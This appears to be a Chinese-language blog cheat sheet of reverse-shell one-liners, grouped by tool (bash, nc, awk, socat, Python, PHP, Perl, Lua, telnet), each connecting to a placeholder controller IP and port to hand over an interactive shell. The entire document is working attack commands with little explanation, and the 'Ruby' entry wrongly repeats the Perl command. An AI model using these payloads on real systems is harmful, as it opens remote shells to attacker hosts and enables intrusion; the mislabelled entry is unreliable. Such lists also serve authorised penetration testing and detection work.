bash
bash -i >& /dev/tcp/[控制端IP]/[控制端监听Port] 0>&1
exec /bin/sh 0</dev/tcp/[控制端IP]/[控制端监听Port] 1>&0 2>&0
exec 5<>/dev/tcp/[控制端IP]/[控制端监听Port];cat <&5 | while read line; do $line 2>&5 >&5;done
nc
nc -e /bin/bash [控制端IP] [控制端监听Port]
awk
awk 'BEGIN{s="/inet/tcp/0/[控制端IP]/[控制端监听Port]";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
socat
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:[控制端IP]:[控制端监听Port]
Python
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('[控制端IP]',[控制端监听Port]));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
PHP
php -r '$sock=fsockopen("[控制端IP]",[控制端监听Port]);exec("/bin/sh -i <&3 >&3 2>&3");'
Perl
perl -e 'use Socket;$i="[控制端IP]";$p=[控制端监听Port];socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby
perl -e 'use Socket;$i="[控制端IP]";$p=[控制端监听Port];socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('[控制端IP]','[控制端监听Port]');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Telnet
telnet [控制端IP] [控制端监听Port1] | /bin/bash | telnet [控制端IP] [控制端监听Port2] # 在攻击主机上分别监听 Port1 和 Port2 ,执行反弹 shell 命令后,在 Port1 终端输入命令,Port2 查看命令执行后的结果
标签:bin,控制,shell,socket,IP,监听,命令,反弹,Port From: https://www.cnblogs.com/M0x1NG/p/17259463.html